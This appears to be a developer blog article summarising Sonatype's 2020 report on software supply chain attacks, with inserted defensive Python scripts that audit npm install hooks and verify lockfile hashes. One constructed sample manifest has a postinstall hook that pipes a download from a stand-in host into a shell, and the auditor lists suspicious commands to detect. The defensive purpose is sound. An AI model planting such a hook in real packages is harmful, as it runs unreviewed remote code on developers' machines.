Developers
September 14, 2020

2020 State of the Software Supply Chain: Open Source Software in the Crosshairs

The past 12 months have seen a massive increase in cyberattacks against open-source software.

Open-source software has traditionally been regarded as secure, often more secure than closed-source software, largely because of the number of people reading and tinkering with the underlying code. The more people look at it, the better the odds that bugs and security issues are found before the software goes into production.

In recent years, however, open-source projects and the package ecosystems around them have become a prime target for attackers. One of the most popular types of attack is the supply chain attack.

Sonatype has just released its 2020 State of the Software Supply Chain, and the message is clear: It’s open season on open-source software.

What Is a Supply Chain Attack?

Supply chain attacks are the most prized of hacks: compromise one widely used component and every product built on it inherits the compromise. Sonatype's report divides them into two types: legacy and next-generation attacks.

Legacy supply chain attacks exploit a publicly disclosed vulnerability in software a company relies on, including open-source components. Once the vulnerability is disclosed, every application that embeds the affected component is exposed until it is patched, and the race is between the attacker and the patching team. As Sonatype's report highlights, this type of attack is what led to the infamous Equifax breach: Equifax was running a version of Apache Struts2 with a disclosed remote code execution flaw (CVE-2017-5638) and was breached before it had patched.

Following public disclosure from the Apache Foundation pertaining to a severe vulnerability in the popular Struts2 Framework, adversaries sprang into action and began exploiting the newly-known defect within 72 hours, well before many commercial IT teams (including Equifax) could respond and update their frameworks. This remarkably small window to respond led to numerous high-profile breaches, including Canada Statistics, Canada Revenue, the GMO Payment Gateway, Okinawa Power, Japan Post, India Post, and India’s AADHAAR digital identification system.

As effective, and terrifying, as this legacy type of supply chain attack may be, the next-generation variation is far worse. Rather than waiting for a vulnerability to be disclosed, the attacker compromises a point upstream in the software development pipeline or supply chain: a maintainer's account, a source repository, a build system, or a package registry. From there they can introduce a backdoor, virus, or other malware, and any software that passes through that point afterwards ships with the implanted code. Because the software arrives from a trusted source, under the project's own name and version number, customers have little or no reason to suspect a problem until it is too late.

One of the most popular methods of carrying out a next-generation supply chain attack is to publish malicious packages to public software repositories, as Sonatype's report points out:

According to security researchers at the University of Bonn, SAP Labs France, and Fraunhofer FKIE, “From an attacker’s point of view, [large scale, public internet-based] package repositories represent a reliable and scalable malware distribution channel. Thus far, Node.js (npm) and Python (PyPI) repositories have been the primary targets of malicious packages, supposedly due to the fact that malicious code can be easily triggered during package installation.”
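The researchers quoted above single out install-time execution as the reason npm and PyPI attract malicious packages. As an added example (not code from the article or from Sonatype's report), the Python script below audits npm package.json manifests for the lifecycle hooks that npm runs automatically during installation and flags commands that fetch or execute remote content. The manifests, package names and the list of suspicious substrings are constructed for illustration.

```python
"""Flag npm manifests that declare install-time lifecycle scripts.

Added example, not from the article or the Sonatype report. The manifests and
the suspicious-substring list below are constructed for illustration.
"""
from __future__ import annotations

import json

# npm runs these automatically during `npm install` of a registry package;
# they are the hooks that let a malicious package execute before anyone
# reads its code. ("prepare" also runs, but only for git dependencies.)
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Substrings that rarely belong in a legitimate install hook (constructed list).
SUSPICIOUS = ("curl ", "wget ", "| sh", "| bash", "base64", "eval(",
              "child_process", "/etc/passwd", "http://", "https://")


def audit_manifest(manifest: dict) -> list[dict]:
    """Return one finding per install-time hook in a parsed package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [p for p in SUSPICIOUS if p in cmd]
        findings.append({
            "package": f"{manifest.get('name')}@{manifest.get('version')}",
            "hook": hook,
            "command": cmd,
            # Any install hook deserves a look; one that reaches out or pipes
            # into a shell is treated as high risk.
            "risk": "high" if hits else "review",
            "matched": hits,
        })
    return findings


def audit_manifests(raw_manifests: list[str]) -> list[dict]:
    """Audit several package.json documents given as JSON strings."""
    findings = []
    for raw in raw_manifests:
        findings.extend(audit_manifest(json.loads(raw)))
    return findings


# Constructed manifests: one with no install hooks, one with a legitimate
# native build step, and one whose postinstall pipes a download into a shell.
SAMPLE_MANIFESTS = [
    json.dumps({"name": "left-padder", "version": "1.0.0",
                "scripts": {"test": "node test.js"}}),
    json.dumps({"name": "native-thing", "version": "2.1.0",
                "scripts": {"install": "node-gyp rebuild"}}),
    json.dumps({"name": "lodahs", "version": "4.17.0",
                "scripts": {"postinstall": "curl -s https://example.invalid/x | sh"}}),
]

if __name__ == "__main__":
    for f in audit_manifests(SAMPLE_MANIFESTS):
        print(f"{f['risk']:7} {f['package']:22} {f['hook']:12} {f['command']}")
```

Running it prints a "review" line for native-thing's build step and a "high" line for the piped download. The blunt version of the same control is to refuse install-time execution altogether: `npm ci --ignore-scripts` on the npm side, and `pip install --only-binary :all:` on the Python side so that no sdist's setup.py runs during installation.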

Next-generation software supply chain attacks are possible for three reasons:

1. Open source projects rely on contributions from thousands of volunteer developers, and discriminating between community members with good or malicious intent is difficult, if not impossible.

2. Open source projects themselves typically incorporate hundreds — if not thousands — of dependencies from other open-source projects, which may contain known vulnerabilities. While some open source projects demonstrate exemplary hygiene as measured by mean time to remediate (MTTR) and mean time to update (MTTU), many others do not (see Chapter 3). The sheer volume of open source in use and the massive number of dependencies makes it difficult to quickly evaluate the quality and security of every new version of a dependency.

3. The ethos of open source is built on “shared trust” between a global community of individuals, which creates a fertile environment whereby bad actors can prey upon good people with surprising ease.

To make matters even worse, the Linux Foundation’s Core Infrastructure Initiative found that 7 of the top 10 most-used software packages were hosted on an individual developer’s account. Each of these individual accounts represents a significant security risk and raises a host of questions about the integrity of the software supply chain. Most critically, would there be any reliable way of knowing downstream if the packages on one of these accounts were hacked?

The Growing Threat and the Solution

Sonatype's researchers found that, over the last 12 months, there has been a 430% year-over-year growth in next-generation supply chain attacks. There are a couple of ways these attacks are carried out.

Typosquatting is one of the most popular. The attacker publishes a malicious component under a name that is a near miss for a popular, legitimate one: a transposed pair of letters, a dropped hyphen, a 1 in place of an l. A developer who mistypes the name of the component they're looking for installs the malicious package instead, and because install hooks run automatically, the payload executes before anyone has read a line of its code.

The second line of attack is direct malicious code injection. This kind of attack relies on the attacker gaining write access to a project's source repository or publishing pipeline. That may come from compromising a developer's or project manager's computer, stealing their credentials, or some degree of social engineering. Whatever the method used, once the attacker can commit or publish under the project's name, there is virtually no limit to the damage they can cause, and every downstream consumer pulls the change as a routine update.

There is little most companies can do to completely prevent these kinds of attacks, especially upstream, so Sonatype recommends that companies adopt a "rapid upgrade posture": know exactly which open-source components are in every application, and be able to move to a fixed version within hours rather than weeks, since the Struts2 exploitation window was 72 hours. This enables companies to respond quickly to exploits, whether they are traditional or next-generation supply chain attacks. One caveat: upgrading fast is not the same as upgrading blindly. Against a next-generation attack the newest version may be the poisoned one, so the upgrade pipeline should verify downloaded artifacts against pinned hashes and review what changed in a new release before promoting it.
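The report's question of whether there is any reliable way of knowing downstream that a package was tampered with has one concrete partial answer: pin the hash of every artifact at lock time and verify it on every install, so that a re-published package with the same version number but different bytes fails loudly. As an added example (not code from the article or from Sonatype), the Python script below performs that check against a package-lock.json style manifest using the same Subresource Integrity format npm records. The lockfile, package names and artifact bytes are all constructed here so that it runs offline.

```python
"""Check fetched package artifacts against the integrity hashes pinned in a lockfile.

Added example; not code from the article or from Sonatype. The lockfile and the
artifact bytes are constructed in this file so that it runs offline.
"""
from __future__ import annotations

import base64
import hashlib


def sri(data: bytes, algo: str = "sha512") -> str:
    """Subresource Integrity string in package-lock.json form: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_lockfile(lock: dict, artifacts: dict[str, bytes]) -> dict[str, str]:
    """Return a verdict per locked dependency: ok, TAMPERED, missing-artifact or unpinned."""
    verdicts = {}
    for path, entry in lock.get("packages", {}).items():
        if path == "":                       # the empty key is the root project itself
            continue
        name = path[len("node_modules/"):] if path.startswith("node_modules/") else path
        expected = entry.get("integrity")
        if not expected:
            verdicts[name] = "unpinned"      # nothing to check against: a gap in the lockfile
            continue
        algo = expected.split("-", 1)[0]     # e.g. "sha512"
        blob = artifacts.get(name)
        if blob is None:
            verdicts[name] = "missing-artifact"
        elif sri(blob, algo) == expected:
            verdicts[name] = "ok"
        else:
            verdicts[name] = "TAMPERED"      # bytes differ from what was pinned at lock time
    return verdicts


# Constructed artifacts as they looked when the lockfile was generated.
ORIGINAL_TARBALLS = {
    "left-padder": b"package/index.js\nmodule.exports = s => ' '.repeat(8 - s.length) + s;\n",
    "widget-lib": b"package/index.js\nmodule.exports = { render() { return '<div/>'; } };\n",
}

# Constructed package-lock.json in the lockfileVersion 2/3 "packages" layout.
LOCKFILE = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "0.1.0"},
        "node_modules/left-padder": {"version": "1.0.0",
                                     "integrity": sri(ORIGINAL_TARBALLS["left-padder"])},
        "node_modules/widget-lib": {"version": "2.3.1",
                                    "integrity": sri(ORIGINAL_TARBALLS["widget-lib"])},
        "node_modules/color-utils": {"version": "0.9.0"},   # version only, no hash
    },
}

# Constructed artifacts as served today: widget-lib 2.3.1 has been re-published
# under the same version number with different contents.
SERVED_TARBALLS = {
    "left-padder": ORIGINAL_TARBALLS["left-padder"],
    "widget-lib": ORIGINAL_TARBALLS["widget-lib"] + b"console.log('rebuilt');\n",
    "color-utils": b"package/index.js\nmodule.exports = {};\n",
}

if __name__ == "__main__":
    for name, verdict in verify_lockfile(LOCKFILE, SERVED_TARBALLS).items():
        print(f"{verdict:17} {name}")
```

The "unpinned" verdict is the one to watch in real lockfiles: a dependency with a version but no integrity field is exactly the gap a re-published artifact slips through. In practice `npm ci` performs this check itself whenever a lockfile is present, and the pip equivalent is `pip install --require-hashes -r requirements.txt` with a `--hash=sha256:...` entry on every requirement.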

Conclusion

Without a doubt, open-source software is in the crosshairs and supply chain attacks are on the rise. By having a security-first approach and a rapid upgrade posture, companies can mitigate much of the potential damage.

Tags: Supply Chain, Open Source Software, Cyberattacks
Matt Milano, Technical Writer
Matt is a tech journalist and writer with a background in web and software development.
